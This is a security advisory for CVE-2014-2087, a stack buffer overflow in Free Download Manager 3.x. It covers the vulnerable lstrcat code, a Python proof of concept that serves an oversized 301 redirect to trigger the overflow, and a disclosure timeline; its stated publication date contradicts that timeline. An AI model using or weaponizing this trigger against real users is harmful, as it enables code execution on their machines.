Free Download Manager 3.x Buffer Overflow

2014-03-14T00:00:00
ID PACKETSTORM:125729
Type packetstorm
Reporter Julien Ahrens
Modified 2014-03-14T00:00:00

Description

                                        
                                            `RCE Security Advisory  
http://www.rcesecurity.com  
  
  
1. ADVISORY INFORMATION  
-----------------------  
Product: Free Download Manager  
Vendor URL: www.freedownloadmanager.org  
Type: Stack-based Buffer Overflow [CWE-121]  
Date found: 2014-02-20  
Date published: 2014-02-13  
CVSSv2 Score: 9,3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)  
CVE: CVE-2014-2087  
  
  
2. CREDITS  
----------  
This vulnerability was discovered and researched by Julien Ahrens from  
RCE Security.  
  
  
3. VERSIONS AFFECTED  
--------------------  
Free Download Manager v3.9.3 build 1360 (latest)  
Free Download Manager v3.8 build 1173  
Free Download Manager v3.0 build 852  
and other older versions may be affected too.  
  
  
4. VULNERABILITY DESCRIPTION  
----------------------------  
A stack-based buffer overflow vulnerability has been identified in the  
Free Download Manager.  
  
The application parses download requests, which are added to the  
download queue, but does not properly validate the length of the  
complete download queue object when it’s removed from the queue by the  
user. The following function from fdm.exe (source file:  
Downloads_Deleted.cpp) is triggered on deletion:  
  
void CDownloads_Deleted::UpdateDownload(int iItem)  
  
This function reads the filename of the download object using  
CDownloads_Tasks::GetFileName into szFile and adds the whole URL value  
as a description (in brackets) via an insecure strcat() sequence to  
szFile during the queue deletion process.  
  
Since the application follows HTTP 301 redirects, an attacker who  
controls the target HTTP server is able to send arbitrary long filename  
values to exploit this flaw. If the complete name of the queued download  
exceeds the size of szFile (10000 bytes), strcat() writes outside the  
expected memory boundaries.   
  
This leads to a stack-based buffer overflow with an overwritten SEH  
chain or return points, resulting in remote code execution. Successful  
exploits can allow remote attackers to execute arbitrary code with the  
privileges of the user running the application. Failed exploits will  
result in a denial-of-service condition.  
  
This vulnerability is also exploitable locally via "File->Import->Import  
list of downloads"  
  
  
5. VULNERABLE CODE PART  
-----------------------  
// Downloads_Deleted.cpp  
  
void CDownloads_Deleted::UpdateDownload(int iItem)  
{  
vmsDownloadSmartPtr dld = (fsDownload*)GetItemData (iItem);  
  
CHAR szFile [10000];   
CDownloads_Tasks::GetFileName (dld, szFile);  
lstrcat (szFile, " (");  
lstrcat (szFile, dld->pMgr->get_URL ());  
lstrcat (szFile, ")");  
SetItemText (iItem, 0, szFile);  
[..]  
}  
  
  
6. PROOF-OF-CONCEPT (PYTHON)  
----------------------------  
#!/usr/bin/python  
from socket import *  
from time import sleep  
  
host = "192.168.0.1"  
port = 80  
  
s = socket(AF_INET, SOCK_STREAM)  
s.bind((host, port))  
s.listen(1)  
print "\n[+] Listening on %d ..." % port  
  
cl, addr = s.accept()  
print "[+] Connection accepted from %s" % addr[0]  
  
junk0 = "\x43" * 9000  
  
payload = junk0  
  
buffer = "HTTP/1.1 301 Moved Permanently\r\n"  
buffer += "Date: Thu, 20 Feb 2014 11:31:08 GMT\r\n"  
buffer += "Server: Apache/2.2.22 (Debian)\r\n"  
buffer += "Location: "+ payload + "\r\n"  
buffer += "Vary: Accept-Encoding\r\n"  
buffer += "Content-Length: 8000\r\n"  
buffer += "Keep-Alive: timeout=5, max=100\r\n"  
buffer += "Connection: Keep-Alive\r\n"  
buffer += "Content-Type: text/html; charset=iso-8859-1\r\n"  
buffer += "\r\n"  
buffer += "<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n"  
buffer += "<html><head>\n"  
buffer += "<title>301 Moved Permanently</title>\n"  
buffer += "</head><body>\n"  
buffer += "<h1>Moved Permanently</h1>\n"  
buffer += "<p>The document has moved <a  
href=\""+payload+"\">here</a>.</p>\n"  
buffer += "</body></html>\n"  
  
print cl.recv(1000)  
cl.send(buffer)  
print "[+] Sending buffer: OK\n"  
  
sleep(1)  
cl.close()  
s.close()  
  
  
7. SOLUTION  
-----------  
None  
  
  
8. REPORT TIMELINE  
------------------  
2014-02-20: Discovery of the vulnerability  
2014-02-21: Vendor Notification #1 with preset disclosure date (2014-03-09)  
2014-02-24: MITRE assigns CVE-2014-2087  
2014-02-25: Vendor Notification #2  
2014-02-26: Vendor Notification #3  
2014-03-05: Vendor Response  
2014-03-05: Vulnerability details sent to vendor  
2014-03-09: RCE Security asks for a status update  
2014-03-13: No response from vendor  
2014-03-13: Full Disclosure according to disclosure policy  
  
  
9. REFERENCES  
-------------  
http://www.rcesecurity.com/2014/03/cve-2014-2087-free-download-manager-cdownloads_deleted-updatedownload-remote-code-execution  
`